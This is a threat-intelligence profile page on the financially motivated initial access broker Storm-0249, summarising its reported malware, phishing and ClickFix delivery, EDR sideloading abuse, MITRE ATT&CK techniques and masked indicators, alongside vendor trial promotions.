12 malware families

Storm-0249

Also known asStorm-0249

Storm-0249 is a financially motivated cybercriminal threat actor tracked by Microsoft as an initial access broker active since 2021. Microsoft states the actor is known for distributing at minimum BazaLoader, IcedID, Bumblebee, Emotet, Latrodectus, and Brute Ratel C4 (BRc4), and for brokering network access to ransomware operators. Reporting describes Storm-0249 as having evolved from large-scale or mass-phishing activity into more targeted and stealthier campaigns that prepare victim environments for follow-on ransomware attacks. Observed delivery and access methods directly mentioned in the source material include tax-themed phishing, fake DocuSign flows, compromised legitimate websites, malvertising, SEO poisoning, fake ads, and ClickFix social engineering. Microsoft attributed spring 2025 Latrodectus campaigns, including IRS-themed phishing and fake Windows 11 Pro download sites, to Storm-0249. Microsoft also reported that beginning in March 2025, Storm-0249 shifted from traditional email delivery to compromising legitimate websites, potentially via WordPress vulnerabilities, and using ClickFix to deliver Latrodectus or other initial access malware. The actor is specifically described as abusing trusted endpoint detection and response components and built-in Windows utilities to stealthily load malware, establish persistence, and support ransomware operators. Multiple reports state that Storm-0249 weaponized legitimate EDR processes, including SentinelOne components, for DLL sideloading, and used Windows utilities such as curl.exe and fileless PowerShell execution to blend with normal activity and evade detection. Source material also states Storm-0249 used malicious MSI installers with elevated privileges and leveraged sideloaded DLLs for command-and-control, reconnaissance, and persistence. Storm-0249 is also linked by Microsoft to Fox Tempest’s malware-signing-as-a-service ecosystem. Microsoft states that Storm-0249 was among the threat actors that used Fox Tempest-signed malware in active intrusions, alongside Vanilla Tempest, Storm-0501, and Storm-2561. Fox Tempest-signed malware was reported as being delivered through malvertising, SEO poisoning, and fake ads, and associated downstream activity included ransomware and malware families such as Oyster, Lumma Stealer, Vidar, Rhysida, Akira, INC, Qilin, and BlackByte. Known alias directly provided in the content: storm_0249.

Are they targeting you?

Know when an actor pivots toward your sector

Mallory correlates actor tradecraft and target patterns against your stack, your sector, and your geography. See overlap before they land.

Start free trial

OPERATIONAL PROFILE

Targeting

Who, where, and (when attributed) which flag flies behind the operation. Pulled from open-source reporting and Mallory's analyst review.

Where they target

Geographies tied to known operations.

🇺🇸 United States

MITRE ATT&CK

Tradecraft

17 distinct techniques observed across reporting, grouped by tactic. Hover any cell for the evidence excerpt; click through for MITRE's full description.

8 of 15 tactics25 techniques×N= number of intelligence reports citing this technique

MITRE ATT&CK

TA0042

Resource Development

2 techniques

T1583

Acquire Infrastructure

T1583.006

Web Services

T1608

Stage Capabilities

T1608.006

SEO Poisoning

TA0001

Initial Access

2 techniques

T1189

Drive-by Compromise

T1566×2

Phishing

T1566.001×2

Spearphishing Attachment

T1566.002

Spearphishing Link

TA0002

Execution

3 techniques

T1053

Scheduled Task/Job

T1053.005

Scheduled Task

T1059

Command and Scripting Interpreter

T1059.001

PowerShell

T1059.003

Windows Command Shell

T1204×2

User Execution

T1204.002×2

Malicious File

TA0003

Persistence

1 technique

T1053

Scheduled Task/Job

T1053.005

Scheduled Task

TA0004

Privilege Escalation

1 technique

T1053

Scheduled Task/Job

T1053.005

Scheduled Task

TA0005

Stealth

2 techniques

T1036×2

Masquerading

T1218

System Binary Proxy Execution

TA0112

Defense Impairment

1 technique

T1553

Subvert Trust Controls

T1553.002×5

Code Signing

TA0011

Command and Control

1 technique

T1071

Application Layer Protocol

T1071.001

Web Protocols

ARSENAL

Associated malware families

12 malware families attributed to this actor across reporting.

FamilyContextEvidenceLast seen

LatrodectusLatrodectus is a downloader used by adversaries to execute arbitrary commands and deliver additional payloads, frequently leveraging financially-themed lures.4Jun 14, 2026

BruteRatel C4Earlier this April, the Redmond-based company warned of several phishing campaigns leveraging tax-related themes to deploy malware such as Latrodectus, AHKBot, GuLoader, and BruteRatel C4 (BRc4). The phishing pages, it added, were delivered via RaccoonO365, with one such campaign attributed to an initial access broker called Storm-0249.2May 27, 2026

Lumma StealerAssociated malware includes Rhysida ransomware, Lumma Stealer, Vidar infostealer, and the Oyster (Broomstick) backdoor.2May 20, 2026

VidarAssociated malware includes Rhysida ransomware, Lumma Stealer, Vidar infostealer, and the Oyster (Broomstick) backdoor.2May 20, 2026

AHKBOTEarlier this April, the Redmond-based company warned of several phishing campaigns leveraging tax-related themes to deploy malware such as Latrodectus, AHKBot, GuLoader, and BruteRatel C4 (BRc4). The phishing pages, it added, were delivered via RaccoonO365, with one such campaign attributed to an initial access broker called Storm-0249.1May 27, 2026

7 additional families tracked in Mallory.

IOCS

Observables

16 indicators attributed to this actor: domains, IPs, hashes, and other artifacts pulled from reporting. View more in app.

16 IOCsView more in app

Domains

10 total

••••••.com•••••••.ru••••••••.com•••••••••.net••••••••••.com•••••••••••.ru••••••••••••.com••••••.ru+2

hash.sha256

4 total

••••••••••••••••••••••••••••••••••••••

uri

2 total

•••••••••••••••••

IOC values are gated. View more in Mallory for domains, IPs, hashes, and other artifacts, or pipe them straight into your SIEM.

ACTIVITY FEED

Recent activity

20 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.

20 SOURCESView more in app

cysecurity newsNews

May 30, 2026

Microsoft Dismantles Malware-Signing Network Exploiting Azure Artifact Signing Service - CySecurity News - Latest Information Security and Hacking Incidents

Named by Microsoft as a threat group that utilized malware signed through Fox Tempest's fraudulent signing service.

xakepNews

May 22, 2026

Microsoft конфисковала домен сервиса, который использовался для подписи вредоносного ПО - Хакер

Named as a customer of Fox Tempest's malware-signing service.

scworldNews

May 20, 2026

Microsoft disrupts Fox Tempest malware-signing service | brief | SC Media

Named as a threat actor linked to the Fox Tempest malware-signing service.

cyber security newsNews

May 20, 2026

Fox Tempest Malware-Signing Service Abused Microsoft Artifact Signing to Certify Malware

Named activity cluster observed using Fox Tempest-signed malware in real-world intrusions.

+17 more in the timeline

What this page doesn’t show

The version that knows your environment.

This page is what’s public. Mallory adds the parts that aren’t: sector and geo overlap with your footprint, the IOCs they’re burning right now, detection coverage, and what to do next.

Start free trial

Target overlap

Match sector + geo + tech-stack targeting against your real footprint.

Tradecraft mapping17

Every observed MITRE ATT&CK technique, grouped by tactic.

Malware arsenal12

Families this actor is known to deploy, with IOCs and behavior.

Exploited CVEs

CVEs this actor has used in known campaigns.

Detection signatures

YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.

Observables16

Domains, IPs, and hashes tied to this actor, refreshed continuously.